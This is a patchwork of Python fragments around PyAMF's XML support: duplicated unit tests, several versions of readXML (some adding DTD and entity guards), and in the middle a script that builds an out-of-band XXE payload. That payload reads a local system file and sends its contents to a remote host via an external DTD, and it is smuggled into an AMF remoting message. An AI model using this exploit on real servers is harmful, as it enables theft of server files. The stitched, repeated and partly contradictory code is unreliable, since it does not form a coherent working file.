def test_xml_references(self):
self.buf.truncate(0)
self.buf.write("\x0f\x00\x00\x00\x19<a><b>hello world</b></a>" "\x07\x00\x00")
self.buf.seek(0)
self.assertEqual(
xml.tostring(xml.fromstring("<a><b>hello world</b></a>")), xml.tostring(self.decoder.readElement())
)
self.assertEqual(
xml.tostring(xml.fromstring("<a><b>hello world</b></a>")), xml.tostring(self.decoder.readElement())
)
def test_xml_references(self):
self.buf.truncate(0)
self.buf.write('\x0f\x00\x00\x00\x19<a><b>hello world</b></a>'
'\x07\x00\x00')
self.buf.seek(0)
self.assertEqual(
xml.tostring(xml.fromstring('<a><b>hello world</b></a>')),
xml.tostring(self.decoder.readElement()))
self.assertEqual(
xml.tostring(xml.fromstring('<a><b>hello world</b></a>')),
xml.tostring(self.decoder.readElement()))
def test_amf3_xml(self):
self.encoder.use_amf3 = True
blob = '<root><sections><section /><section /></sections></root>'
blob = xml.tostring(xml.fromstring(blob))
bytes = self.encode(xml.fromstring(blob))
buf = util.BufferedByteStream(bytes)
self.assertEqual(buf.read_uchar(), 17)
self.assertEqual(buf.read_uchar(), 11)
self.assertEqual(buf.read_uchar() >> 1, buf.remaining())
self.assertEqual(buf.read(), blob)
def test_amf3_xml(self):
self.encoder.use_amf3 = True
blob = '<root><sections><section /><section /></sections></root>'
blob = xml.tostring(xml.fromstring(blob))
bytes = self.encode(xml.fromstring(blob))
buf = util.BufferedByteStream(bytes)
self.assertEqual(buf.read_uchar(), 17)
self.assertEqual(buf.read_uchar(), 11)
self.assertEqual(buf.read_uchar() >> 1, buf.remaining())
self.assertEqual(buf.read(), blob)
def test_xml(self):
blob = '<a><b>hello world</b></a>'
self.assertEncoded(
xml.fromstring(blob),
'\x0f\x00\x00\x00\x19' + blob
)
def test_xml(self):
blob = b'<a><b>hello world</b></a>'
self.assertEncoded(
xml.fromstring(blob),
b'\x0f\x00\x00\x00\x19' + blob
)
def test_xml_references(self):
blob = '<a><b>hello world</b></a>'
x = xml.fromstring(blob)
self.assertEncoded(
[x, x],
'\n\x00\x00\x00\x02' + ('\x0f\x00\x00\x00\x19' + blob) * 2
)
def test_xml_references(self):
blob = b'<a><b>hello world</b></a>'
x = xml.fromstring(blob)
self.assertEncoded(
[x, x],
b'\n\x00\x00\x00\x02' + (b'\x0f\x00\x00\x00\x19' + blob) * 2
)
def readXML(self):
"""
Read XML.
"""
data = self.readLongString()
root = xml.fromstring(data)
self.context.addObject(root)
return root
def readXML(self):
"""
Read XML.
"""
data = self.readLongString()
root = xml.fromstring(data)
self.context.addObject(root)
return root
def readXML(self):
"""
Read XML.
"""
data = self.readLongString()
root = xml.fromstring(
data,
forbid_dtd=self.context.forbid_dtd,
forbid_entities=self.context.forbid_entities,
)
self.context.addObject(root)
return root
def readXML(self):
"""
Read XML.
"""
data = self.readLongString()
root = xml.fromstring(
data,
forbid_dtd=self.context.forbid_dtd,
forbid_entities=self.context.forbid_entities,
)
self.context.addObject(root)
return root
def readXML(self):
"""
Reads an xml object from the stream.
@return: An etree interface compatible object
@see: L{xml.set_default_interface}
"""
ref = self.readInteger(False)
if ref & REFERENCE_BIT == 0:
return self.context.getObject(ref >> 1)
xmlstring = self.stream.read(ref >> 1)
x = xml.fromstring(xmlstring)
self.context.addObject(x)
return x
def readXML(self):
"""
Reads an xml object from the stream.
@return: An etree interface compatible object
@see: L{xml.set_default_interface}
"""
ref = self.readInteger(False)
if ref & REFERENCE_BIT == 0:
return self.context.getObject(ref >> 1)
xmlstring = self.stream.read(ref >> 1)
x = xml.fromstring(xmlstring)
self.context.addObject(x)
return x
from pyamf import xml
import requests
requests.packages.urllib3.disable_warnings()
xxexml = '''<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///etc/cron.deny">
<!ENTITY % remote SYSTEM "http://172.16.100.100/evil.xml">
%remote;
%all;
%send;
]>'''
evil_xml = '''<!ENTITY % all "<!ENTITY % send SYSTEM 'http://172.16.100.100/report.php?file=%file;'>">'''
xmlp = '<a>' + 'x' * (len(xxexml) - 7) + '</a>'
xmlObj = xml.fromstring(xmlp)
amfReq = CommandMessage(operation=5,
destination=u'',
messageID=u'F9E40DCB-78E2-68AD-0BC9-A56F41399B88',
body=xmlObj,
clientId=None,
headers={
'DSID': u'nil',
'DSMessagingVersion': 1.0
})
envelope = pyamf.remoting.Envelope(amfVersion=3)
envelope["/%d" % 1] = pyamf.remoting.Request(u'null', [amfReq])
message = pyamf.remoting.encode(envelope)
msg = message.getvalue()
msg = msg.replace(xmlp, xxexml)
print 'payload: %r' % (msg)
def test_xmlstring(self):
x = xml.fromstring('<a><b>hello world</b></a>')
self.assertEqual(self.encode(x), '\x0b\x33<a><b>hello world</b></a>')
self.assertEqual(self.encode(x), '\x0b\x00')
def test_xml_references(self):
blob = "<a><b>hello world</b></a>"
x = xml.fromstring(blob)
self.assertEncoded([x, x], "\n\x00\x00\x00\x02" + ("\x0f\x00\x00\x00\x19" + blob) * 2)
def test_xmlstring(self):
x = xml.fromstring('<a><b>hello world</b></a>')
self.assertEqual(self.encode(x), '\x0b\x33<a><b>hello world</b></a>')
self.assertEqual(self.encode(x), '\x0b\x00')
def test_xml(self):
blob = "<a><b>hello world</b></a>"
self.assertEncoded(xml.fromstring(blob), "\x0f\x00\x00\x00\x19" + blob)